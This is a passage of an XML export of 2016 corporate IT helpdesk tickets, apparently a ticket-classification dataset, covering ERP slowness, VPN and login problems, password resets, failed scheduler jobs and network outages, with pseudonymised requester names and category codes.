    <s v="_x000a__x000a_received from: ryculmsd.wofgvkrb@gmail.com_x000a__x000a_hi ;_x000a__x000a_can we just make sure of these facts â€“ please._x000a_please can you confirm if this customer has a valid statement as he is complaining  about our service and response to his mail and info forwarded to him ._x000a__x000a_please just copy me in with your comments._x000a_janhytrn ooshstyizen_x000a_sales manager - construction sa_x000a_ryculmsd.wofgvkrb@gmail.com&lt;mailto:ryculmsd.wofgvkrb@gmail.com&gt;_x000a__x000a_new road king bit catalog:    _x000a__x000a__x000a_from: johan kok [mailto:johan.kok@in-corp.com]_x000a_sent: friday, september 16, 2016 10:51 am_x000a_to: jofghan kddok &lt;jofghan.kddok@alphastdgtyal.com&gt;; janhytrn ooshstyizen &lt;ryculmsd.wofgvkrb@gmail.com&gt;; 'hennidgtydhyue booysen' &lt;hennidgtydhyue.booysen@es.co.za&gt;_x000a_subject: re: revised prices - local_x000a__x000a_hi jan,_x000a__x000a_i did request this before. please could you ensure that your e-mail administrator (wherever in the world he sits), could fix the below:_x000a__x000a_this message was created automatically by mail delivery software._x000a__x000a__x000a__x000a_a message that you sent could not be delivered to one or more of its recipients. this is a permanent error. the following address(es) failed:_x000a__x000a__x000a__x000a_  ryculmsd.wofgvkrb@gmail.com&lt;mailto:ryculmsd.wofgvkrb@gmail.com&gt;_x000a__x000a_    host company-com.mail.protection.outlook.com [207.46.163.247]_x000a__x000a_    smtp error from remote mail server after rcpt to:&lt;ryculmsd.wofgvkrb@gmail.com&lt;mailto:ryculmsd.wofgvkrb@gmail.com&gt;&gt;:_x000a__x000a_    550 5.7.1 service unavailable, client host [154.0.170.195] blocked using customer block list (as27123718)_x000a__x000a__x000a_"/>
    <s v="ryculmsd wofgvkrb"/>
    <x v="26"/>
  </r>
  <r>
    <s v="wunderlist add in"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bmudkpie.qolrvbip@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i use a microsoft mobile phone and in the outlook for the mobile are no tasks available._x000d__x000a__x000d__x000a_can we use wunderlist add in ?_x000d__x000a__x000d__x000a_there is an app for it and an outlook add in, but it's not starting._x000d__x000a__x000d__x000a_best "/>
    <s v="bmudkpie qolrvbip"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ich sehe meine reisekostenabrechnungen in erp nicht mehr (transaktion pr05). "/>
    <s v="ich sehe meine reisekostenabrechnungen in erp nicht mehr (transaktion pr05). es kommt die meldung infotype '0017' for 01.09.2016 does not exist for pers. no._x000d__x000a_"/>
    <s v="pxvzohlu hwyijpgd"/>
    <x v="9"/>
  </r>
  <r>
    <s v="we are not getting communication in to attendance_tool system from the following clocks.  request you to check on priority."/>
    <s v="we are not getting communication in to attendance_tool system from the following clocks.  request you to check on priority."/>
    <s v="noscwdpm akiowsmp"/>
    <x v="18"/>
  </r>
  <r>
    <s v="drucker tauschen ( we39 und we75 ) \gogtyek"/>
    <s v="drucker tauschen ( we39 und we75 ) \gogtyek"/>
    <s v="wrcktgbd wzrgyunp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="account of thomafghk is disabled"/>
    <s v="_x000a__x000a_received from: ustvaifg.hmzfewks@gmail.com_x000a__x000a_hello_x000a__x000a_someone has disabled the ad account of hybegvwo dbgrtqhs / thomafghk 2 days ago._x000a_could you please reactivate it and tell us why it was disabled._x000a_ has changed the location from switzerland to germany, but he is still an employee._x000a__x000a_michghytuael (as the manager of hybegvwo dbgrtqhs) or mathyuithihyt (as the director hr) please confirm that  is still working for company._x000a_"/>
    <s v="ustvaifg hmzfewks"/>
    <x v="19"/>
  </r>
  <r>
    <s v="probleme mit  outlook \ engracia.gonzales-fernandez  "/>
    <s v="probleme mit  outlook \ engracia.gonzales-fernandez  "/>
    <s v="usalikfj lfmpxbcn"/>
    <x v="24"/>
  </r>
  <r>
    <s v="kpobysnc tqvefyui mail box needs to be approved nad then uacyltoe hxgaycze and enable"/>
    <s v="please approve the mailbox of kpobysnc tqvefyui user in following environments:_x000d__x000a_uacyltoe hxgaycze:- _x000d__x000a_tempdev-_x000d__x000a_train-_x000d__x000a_prod-_x000d__x000a__x000d__x000a_"/>
    <s v="ungoxpdc hmxwuyog"/>
    <x v="15"/>
  </r>
  <r>
    <s v="application response time (other network resources work normally)"/>
    <s v="our colleagues have opened a ticket about the same issue that spain (sales org 1248 ) and portugal (sales org 1406) have. _x000d__x000a__x000d__x000a_ticket  inc1551906 _x000d__x000a__x000d__x000a_best "/>
    <s v="gwfozprc kldrsnze"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_512 failed in job_scheduler at: 09/16/2016 04:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_9/16/2016 3:07:31 am :: error: cannot authenticate user._x000d__x000a_soap fault. detail: '', endpoint: ''_x000d__x000a_soap connection is not available. connection id: [HostName_1018.company.company.com]._x000d__x000a_failed to create nfc download stream. nfc path: [nfc://conn:HostName_1018.company.company.com,nfchost:host-30668,stg:datastore-63448@HostName_919/HostName_919.vmx]._x000d__x000a_ _x000d__x000a_job Job_512 failed in job_scheduler at: 09/16/2016 04:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="network access for vahjtusa wenghtyele for fÃ¼rth network drive is required "/>
    <s v="folder :; \\eagcldaten\teams\gpc_x000a_access read and write_x000a_user id weghyndlv "/>
    <s v="rhinvtua aquyjfbs"/>
    <x v="33"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 09/16/2016 04:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_[critical] from: bda-net@lhqSID_1840.company.company.com &quot;lhqSID_1840.company.company.com [/e]&quot;  time: 9/16/2016 4:20:04 am_x000d__x000a_ ipc failure reading net message (ipc read error_x000d__x000a_ system error: [10054] connection reset by peer_x000d__x000a_) =&gt; aborting._x000d__x000a__x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 09/16/2016 04:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="network outage:usa mi :brembo: site hard down since at 9/16/2016 4:04 am et"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __no_______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___9/16/2016 4:04 am et_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_na___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ____na____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ___na______     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ___na________   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ____na_______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ___no____     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ____na____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="probleme mit erpgui \vsdtxwry ngkcdjye"/>
    <s v="probleme mit erpgui \vsdtxwry ngkcdjye"/>
    <s v="vsdtxwry ngkcdjye"/>
    <x v="24"/>
  </r>
  <r>
    <s v="many users in our germany location (earlier germany) are complaining of response time issues in erp"/>
    <s v="we are experiancing slow response times in our location in erp. various transactions ( va01, va02, va21, va22, md04 etc. i am currentlyx on server axhg30335 and mine is ok but others complain.  as i was on server HostName_197 i experienced also issues.  i have heard of at least 3 servers with issues HostName_197,30331 and 30338. please check network or connection and advise."/>
    <s v="ujxvrlzg pkaegicn"/>
    <x v="13"/>
  </r>
  <r>
    <s v="erp zload - releasing orders in vSID_62 take much too long - please check!"/>
    <s v="the erp response time, especially out of zload takes much too long._x000a__x000a_anfghyudrejy"/>
    <s v="kmtpzyre mqlsfkre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp performance"/>
    <s v="_x000a__x000a_received from: ctvaejbo.mjcerqwo@gmail.com_x000a__x000a_hi,_x000a__x000a_we're noticing very slow performance with erp at the uk facility,_x000a__x000a_pollaurid d phlpiops_x000a_manager engineering technology_x000a__x000a__x000a_"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp is slow in multiple locations : poland , united kingdom, germany"/>
    <s v="erp is slow._x000d__x000a_internet is running fine._x000d__x000a_other applications (outlook etc) are running fine._x000d__x000a_many users are affected."/>
    <s v="xnlapdeq wupaeqlv"/>
    <x v="3"/>
  </r>
  <r>
    <s v="laptop not use audio "/>
    <s v="_x000d__x000a__x000d__x000a_received from: yjwivxsh.fcetobrj@gmail.com_x000d__x000a__x000d__x000a_dear it team_x000d__x000a__x000d__x000a_my laptop can't use audio file and not sound._x000d__x000a__x000d__x000a_best "/>
    <s v="yjwivxsh fcetobrj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp is slow for few users at poland office."/>
    <s v="erp is slow for few users at poland office._x000d__x000a_not all users impacted."/>
    <s v="hadbkvwt touedfyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network problems (multiple applications are running slow)"/>
    <s v="how did you determine there are network problems ? all system are very slowly_x000d__x000a__x000d__x000a_is only erp slow ? (please use the quick ticket within the erp folder if only erp is running slow) no_x000d__x000a__x000d__x000a_are more than one transactions impacted? yes_x000d__x000a__x000d__x000a_what erp server are you on (server name is located in the status bar at the bottom _x000d__x000a_right of your screen) ?    apo-server, EU_tool server etc._x000d__x000a__x000d__x000a_do other co-workers also notice slow response times ?  yes, many colleagues in plant_228_x000d__x000a__x000d__x000a_what other applications are running slow ? EU_tool, erp, print drawings, create delivery notes, EU_tool _x000d__x000a__x000d__x000a_"/>
    <s v="zcokibmd xnrthsmj"/>
    <x v="58"/>
  </r>
  <r>
    <s v="job Job_2645 failed in job_scheduler at: 09/16/2016 03:25:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2645 failed in job_scheduler at: 09/16/2016 03:25:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="cannot syncronize outlook appointments to crm"/>
    <s v="_x000d__x000a__x000d__x000a_received from: lzycofut.mzbovhpd@gmail.com_x000d__x000a__x000d__x000a_dear it help team,_x000d__x000a__x000d__x000a_hi._x000d__x000a__x000d__x000a_i cannot synchronize appointments nor press anything from outlook crm tag like attached picture below._x000d__x000a__x000d__x000a_please help me out._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35036.5992ff90]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="lzycofut mzbovhpd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="foreign trade data missing in the inwarehouse_tool"/>
    <s v="inwarehouse_tool 0159130578 was blocked in the system for foreign data were missing in item 20 and 30. after first analysis, infos were available in mm 03 for both concerned materials- inwarehouse_tool is now completed but could you check what happened in order to avoid futur issues (was material correctly entered in mm03, any steps missing ? was there a erp incident that leads to this issue ?...)"/>
    <s v="ahmgtlyf ofgxcrys"/>
    <x v="12"/>
  </r>
  <r>
    <s v="question"/>
    <s v="hello bobhyb,_x000a_sorry, i don't know more than this._x000a_i am copying this to help team, if they could help you further._x000a__x000a__x000a_"/>
    <s v="geylvotd msadrzkj"/>
    <x v="12"/>
  </r>
  <r>
    <s v="vpn access issue"/>
    <s v="hello team,_x000a__x000a_yvhlenaz ptuqhrwk (on cc) cannot connect to vpn._x000a__x000a_he can access to _x000a_but once he tries to connect vpn, small window (below pictures) shows up shortly and disconnected._x000a_(second picture says &quot;discconect&quot;)_x000a_ _x000a_ _x000a__x000a_i checked device manager, but i could not find &quot;other devices&quot; in his pc._x000a_other network adapters have lauacyltoe hxgaycze drivers._x000a_ _x000a__x000a_please give us your advice._x000a__x000a_âˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆž_x000a_xmgptwho fmcxikqz k.k._x000a_æµ…é‡Ž å¥ / takheghshi afefsano_x000a_âˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆžâˆž_x000a_"/>
    <s v="yvhlenaz ptuqhrwk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password blocked"/>
    <s v="_x000a__x000a_received from: wrelsfqa.qfwosjkh@gmail.com_x000a__x000a_good morning_x000a__x000a_please can you unblock user nieghjyukea. we tried using password_management_tool id password manager, but it does not want to work. she cannot get into the system at all._x000a__x000a_kind "/>
    <s v="wrelsfqa qfwosjkh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user tuzkadxv rxloutpn cannot use the &quot;run report&quot; "/>
    <s v="hello team,_x000d__x000a__x000d__x000a_user tuzkadxv rxloutpn is trying to use the &quot;run report&quot; functionality in the opportstorage_product =&gt; opportstorage_product report, which is a 1-page summary of the opportstorage_product, but it does not return any data for him, just a blank screen. . i could not find out why it is happening. _x000d__x000a_could you help me how to troubleshoot in this matheywter?_x000d__x000a__x000d__x000a_the screenshot is taken by me, not the user, just to illustrate which functionality i am talking about. i do not have a screenshot from the user yet, but it is not workng for him on ny of his opportunities. _x000d__x000a__x000d__x000a_"/>
    <s v="tuzkadxv rxloutpn"/>
    <x v="39"/>
  </r>
  <r>
    <s v="job Job_1332 failed in job_scheduler at: 09/16/2016 02:46:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1332 failed in job_scheduler at: 09/16/2016 02:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_3049 failed in job_scheduler at: 09/16/2016 02:16:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_193ftp error: put zmm_bestand_stl.dat_x000d__x000a__x000d__x000a_job Job_3049 failed in job_scheduler at: 09/16/2016 02:16:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="not able to access -inq industrial (-inq.industrial@company.com)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: muqdlobv.qflsdahg@gmail.com_x000d__x000a__x000d__x000a_team,_x000d__x000a__x000d__x000a_i am not able access to -inq industrial (-inq.industrial@company.com&lt;mailto:-inq.industrial@company.com&gt;) for which we receive enquiries about special products._x000d__x000a_from past one week above mentioned shared email box is not functioning for me, whereas other members are able to access the same._x000d__x000a_so i kindly request you to take it upon high priority and confirm back._x000d__x000a__x000d__x000a_"/>
    <s v="muqdlobv qflsdahg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="carrier information lost when bulk indicator is removed  and multiple line delivery can't be processed in kis â€“ carrier ip"/>
    <s v="ship method information is lost when bulk shipment indicator is removed  and   multiple line delivery can't be processed in kis â€“ carrier ipd"/>
    <s v="gzawrocy shbgwxep"/>
    <x v="17"/>
  </r>
  <r>
    <s v="telephony_software  break down"/>
    <s v="when shutdown the computer yesterday, the windows update wasload. i could not stop the update._x000d__x000a_so telephony_software  must be fixed.  _x000d__x000a_see these informations:_x000d__x000a__x000d__x000a_all,_x000d__x000a_we have been identifying the update which is causing the issue._x000d__x000a_when updating your computer disable kb4283716 from the lists with updates._x000d__x000a__x000d__x000a_in case it happened anyway, have it to remove it._x000d__x000a__x000d__x000a_urvitans laqdwvgo_x000d__x000a_cec analyst operational excellence emea _x000d__x000a__x000d__x000a_"/>
    <s v="qdczywsh ofzvapwn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage: usa: site hard down since at 1:13 am et on 09/16."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______1:13 am et on 09/16.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mnlazfsr mtqrkhnx"/>
    <x v="3"/>
  </r>
  <r>
    <s v="gtehdnyushot kennconnect problem "/>
    <s v="_x000d__x000a__x000d__x000a_received from: dxnskvbm.xbaswghy@gmail.com_x000d__x000a__x000d__x000a_hello ,_x000d__x000a__x000d__x000a_i changed my password yesterday._x000d__x000a_i can open kennconnect &amp; log in but things have changed :_x000d__x000a_my favorites dierppeared ._x000d__x000a_it asks to input customer but Â«customer s  search Â» does not work ._x000d__x000a_opening favorites, it says to call helpdesk ._x000d__x000a__x000d__x000a_please call aerp so i am able to work today ._x000d__x000a__x000d__x000a__x000d__x000a_[gtehdnyushot capture]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="dxnskvbm xbaswghy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="milano,italy: duplex mismatch  gi2/0/1 on 1811 router and gi0/0/1 on 4331 router. see discription for more info."/>
    <s v="duplex mismatch: duplex mode on interface gigabitethernet2/0/1 Â· uplink to company-eu-ita-milano-dmvpn-1811-rtr01 on company-eu-ita-milan-g12-3750-core-stack-sw01.company.com is half. check duplex configuration on both end devices of the link and make sure the duplex mode matches._x000d__x000a__x000d__x000a_duplex mismatch: duplex mode on interface gigabitethernet0/0/1 Â· &quot; connection to lan &quot; on company-eu-ita-milano-dmvpn-4331-rtr01.company.com is full. check duplex configuration on both end devices of the link and make sure the duplex mode matches._x000d__x000a_"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="3"/>
  </r>
  <r>
    <s v="urgent! mm 2122084 // dn 9169293441 //pt. indonesia pratma"/>
    <s v="_x000d__x000a__x000d__x000a_received from: aqrhwjgo.cyelqkvs@gmail.com_x000d__x000a__x000d__x000a_dear it team,_x000d__x000a__x000d__x000a_could you please check and advise from where cost on the attached shipping inwarehouse_tool is? as per standard cost, it is only usd 0.04 per piece but it is deusad on shipping document sgd 67.89 (usd 49.55). this matheywter effects a customer to pay high cost of import duty._x000d__x000a__x000d__x000a_best "/>
    <s v="aqrhwjgo cyelqkvs"/>
    <x v="17"/>
  </r>
  <r>
    <s v="unable to connect vpn at home."/>
    <s v="_x000d__x000a__x000d__x000a_received from: qmkpsbgl.zfovlrah@gmail.com_x000d__x000a__x000d__x000a_hello company help,_x000d__x000a__x000d__x000a_could you please check my laptop settings because  i am getting inconsistent company vpn connection at home ?_x000d__x000a__x000d__x000a_"/>
    <s v="dcsaiweo qvstjlem"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/15/2016 23:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap2 failed in job_scheduler at: 09/15/2016 23:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp locked"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xosycftu.olhpmsdw@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_my erp is locked._x000d__x000a_please unlock._x000d__x000a_i used password_management_tool password manager to unlock my account._x000d__x000a_i can use vpn, but can not log in erp_x000d__x000a__x000d__x000a_"/>
    <s v="xosycftu olhpmsdw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to connect to the erp "/>
    <s v="not able to connect to the erp "/>
    <s v="vRxKDhIB sqTVbvkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3052 failed in job_scheduler at: 09/15/2016 22:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_193ftp connection error to system HostName_514  _x000d__x000a__x000d__x000a_job Job_3052 failed in job_scheduler at: 09/15/2016 22:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to submit reports in engineering tool."/>
    <s v="unable to submit reports in engineering tool. please refer to the screenshots."/>
    <s v="qxmujhwg rsgqidxw"/>
    <x v="25"/>
  </r>
  <r>
    <s v="outlook has stopped working "/>
    <s v="_x000d__x000a__x000d__x000a_received from: gzqijaoc.rfywvloa@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i need your help aerp_x000d__x000a_outlook has stopped working in pc._x000d__x000a__x000d__x000a_"/>
    <s v="gzqijaoc rfywvloa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cant open photos from iphone "/>
    <s v="_x000d__x000a__x000d__x000a_received from: eylqgodm.ybqkwiam@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.png@01SID_35008.716912e0]_x000d__x000a__x000d__x000a_best "/>
    <s v="eylqgodm ybqkwiam"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_39hotf failed in job_scheduler at: 09/15/2016 20:07:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_39hotf failed in job_scheduler at: 09/15/2016 20:07:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="dell 7350: skype audio not working"/>
    <s v="dell 7350: skype audio not working._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-updated the bios on the user system._x000d__x000a_-restarted the system._x000d__x000a_-skype audio is now working (uacyltoe hxgaycze call with user_x000d__x000a_-will call the user back tomorrow and check on the issue._x000d__x000a__x000d__x000a_"/>
    <s v="eqxakzyi cwfrjitq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bk_hana_SID_62_arc_dp failed in job_scheduler at: 09/15/2016 19:28:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_62_arc_dp failed in job_scheduler at: 09/15/2016 19:28:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="login issue"/>
    <s v="_x000d__x000a_login issue_x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad and unlocked the account._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that she was able to login._x000d__x000a_-issue resolved."/>
    <s v="gzhjstxr mdnsfipg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user unable to login to the pc."/>
    <s v="user unable to login  to the pc._x000d__x000a_-checked ad and infotrmed user account is not locked._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that she was able to login._x000d__x000a_-issue resolved."/>
    <s v="qfcxbpht oiykfzlr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="distributor_tool login issue"/>
    <s v="distributor_tool login issue"/>
    <s v="gjzqctph otwylgdj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="what is the collaboration_platform link?"/>
    <s v="name:grtaoivq dwjvfkqe_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:grtaoivq.dwjvfkqe@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:what is the collaboration_platform link?"/>
    <s v="grtaoivq dwjvfkqe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request"/>
    <s v="password reset request"/>
    <s v="kbdljsxf kcmqtjgf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="create express stock transiit for mm 7234728 order 35023051 cnc art "/>
    <s v="hi it, _x000d__x000a_can you please help check why, i don't see any error on our side. "/>
    <s v="kaguhxwo uoyipxqg"/>
    <x v="17"/>
  </r>
  <r>
    <s v="user is trying to install the software on a customer pc."/>
    <s v="user is trying to install the software on a customer pc._x000a_-connected to the user system using teamviewer._x000a_-user able to login to the distributor_tool and go to engineering_tool tab to install the software._x000a_-unable to install the software on the user system._x000a_-customer email id: smitctdrhell@ims.supply_x000a_-c#:"/>
    <s v="dcqsolkx kmsijcuz"/>
    <x v="25"/>
  </r>
  <r>
    <s v="password reset "/>
    <s v="password reset "/>
    <s v="zolnubvq ehrqifxp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="jvshydix rzpmnylt : general query "/>
    <s v="jvshydix rzpmnylt : general query "/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mm02: when grade changed on material, engineering tool is not validated if 'save/delete' is selected"/>
    <s v="when mm02 is used to change the grade on a rqfhiong zkwfqagb logic executes that verifies if the engineering tool is valid for the new grade.    this is working correctly if 'save' is selected on the catalog id/ grade screen.  if 'save/delete' is selected the logic is not working and invalid engineering tool values are being left on rqfhiong zkwfqagbs.   _x000d__x000a__x000d__x000a_this is affecting all users not just one.   logic needs corrected for 'save/ delete'"/>
    <s v="dtnhwjve tqdhvazx"/>
    <x v="20"/>
  </r>
  <r>
    <s v="password reset alert from o365"/>
    <s v="password reset alert from o365"/>
    <s v="qmglkaru qiwhfkdv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user wanted to speak to some one in usa and asked for jashyht contact # "/>
    <s v="user wanted to speak to some one in usa and asked for jashyht contact # "/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to skype"/>
    <s v="unable to log in to skype"/>
    <s v="zolnubvq ehrqifxp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sto for notion order //mm 3493130"/>
    <s v="sto for notion order //mm 3493130"/>
    <s v="kaguhxwo uoyipxqg"/>
    <x v="29"/>
  </r>
  <r>
    <s v="ticket update on inplant_860558"/>
    <s v="ticket update on inplant_860558"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cant connect to erp : vpn issue "/>
    <s v="cant connect to erp : vpn issue "/>
    <s v="ijplstng juybetlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i am getting this error when trying to open a hana file.  can you help?"/>
    <s v="erp excel add in issue."/>
    <s v="gvdkupew waphsuen"/>
    <x v="8"/>
  </r>
  <r>
    <s v=" the terminate action for mdulwthb sldowapb has completed."/>
    <s v=" the terminate action for mdulwthb sldowapb has completed."/>
    <s v="blktuiae jzakfmhw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="erp log in issue"/>
    <s v="erp log in issue"/>
    <s v="qtrmxlgv dfruzvam"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa plant power outage saturday 9/17/16 6:30am - 2:00pm"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ekjobdiz.ktelzwvg@gmail.com_x000d__x000a__x000d__x000a_everyone,_x000d__x000a_               the power will be off to the whole usa manufacturing plant on saturday, 9/17/16 from 6:30am until 2:00pm. the generator should keep the computer room running. switches located in remote network closets will drop and turn back on when the power resumes._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ekjobdiz ktelzwvg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="called to unlock ad account for user qcxivzag vyucbagx"/>
    <s v="called to unlock ad account for user qcxivzag vyucbagx"/>
    <s v="bvwepigr ekmarvgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dell 7350: system very slow.mscrm slow."/>
    <s v="dell 7350: system very slow._x000a_-connected to the user system using teamviewer._x000a_-cleared the cache, cookies, temp files._x000a_-updated the symantec on the user._x000a_-updated the system bios._x000a_-restarted the pc._x000a_-advised the user to try again and check._x000a_--user launched mscrm and its was working fine._x000a_-issue resolved._x000a_-c: _x000a_ "/>
    <s v="jziwhldq qslwyozu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to submit expense report"/>
    <s v="unable to submit expense report"/>
    <s v="mwjcsiug fbwthoca"/>
    <x v="0"/>
  </r>
  <r>
    <s v="change skirtylset percentages "/>
    <s v="change skirtylset percentages effective 9/19/2016. see list attached "/>
    <s v="itylnjqw kqiurhbt"/>
    <x v="6"/>
  </r>
  <r>
    <s v="printer setrup"/>
    <s v="id01 printer setup"/>
    <s v="aqourvgz mkehgcdu"/>
    <x v="18"/>
  </r>
  <r>
    <s v="printer driver update"/>
    <s v="printer driver update"/>
    <s v="ybpeiolu cneoghxp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="pwkrlqbc zslqfmka"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not getting connected."/>
    <s v="outlook not getting connected."/>
    <s v="gpdywmbt pmxfiqkl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="audio not working : driver issue "/>
    <s v="audio not working : driver issue "/>
    <s v="zyheqclo mrznuplg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows accout lockout"/>
    <s v="windows accout lockout"/>
    <s v="zujpycos pogmachd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="incorrect vendor in po extract"/>
    <s v="can you please do me a favor and check the po extract file for po 5616741012 and check which vendor has been assigned._x000d__x000a__x000d__x000a_this is because the po is assigned to vendor 2111220700 in erp, but rr shows vendor 2111100659. see attachment for screen prints._x000d__x000a_"/>
    <s v="tckyrinp vbzqslco"/>
    <x v="5"/>
  </r>
  <r>
    <s v="reisekosten error"/>
    <s v="reisekosten error"/>
    <s v="gmneclxj czqthmrs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage :south amerirtca site is hard down at 11:50 am et on 09/15. no backup circuit at the site."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____slo_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________11:50 am et on 09/15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ethics issue."/>
    <s v="_x000d__x000a__x000d__x000a_received from: fmzdkyqv.dbrslnhe@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i still cannot access the beec module, see message below â€“ please correct â€“ "/>
